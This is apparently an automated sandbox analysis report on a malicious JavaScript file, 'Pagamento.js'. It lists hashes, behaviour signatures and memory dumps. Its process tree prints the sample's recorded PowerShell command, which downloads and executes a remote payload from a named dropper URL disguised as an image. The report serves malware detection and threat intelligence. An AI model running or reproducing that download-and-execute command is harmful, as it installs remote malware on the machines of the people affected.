3eafb742af9d3a8bbbe4bd90b19d175ea4b698505cc5623594d0f13ba883692e

Analysis

max time kernel
31s
max time network
33s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
29-05-2023 23:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Pagamento.js
Size

169KB
MD5

c0871f07733a3727e82c64aacda9a85b
SHA1

bf364b5b56ee65351a0bc5bca249ddeed5705e76
SHA256

3eafb742af9d3a8bbbe4bd90b19d175ea4b698505cc5623594d0f13ba883692e
SHA512

56f29de9c7b558ad3e24ee52378ce297bccfcc95bdeb74f3ec463493fe25dd2f869f1d74ede8238fe82b9bb11b9f088d47dea1df53f2a0a1b3a7a6c0ad29217e
SSDEEP

3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKLfbT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokX0bZ0M/EaZ8M

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://propagandaetrafego.com/b.jpg

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 1284 powershell.exe
5 1284 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1284 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1284 powershell.exe

flow	pid	process
4	1284	powershell.exe
5	1284	powershell.exe

pid	process
1284	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1284	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

wscript.exe

description	pid	process	target process
PID 1128 wrote to memory of 1284	1128	wscript.exe	powershell.exe
PID 1128 wrote to memory of 1284	1128	wscript.exe	powershell.exe
PID 1128 wrote to memory of 1284	1128	wscript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Pagamento.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1284-58-0x000000001B210000-0x000000001B4F2000-memory.dmp

Filesize
2.9MB

Download
memory/1284-60-0x00000000024B0000-0x0000000002530000-memory.dmp

Filesize
512KB

Download
memory/1284-61-0x00000000024B0000-0x0000000002530000-memory.dmp

Filesize
512KB

Download
memory/1284-59-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/1284-62-0x00000000024B0000-0x0000000002530000-memory.dmp

Filesize
512KB

Download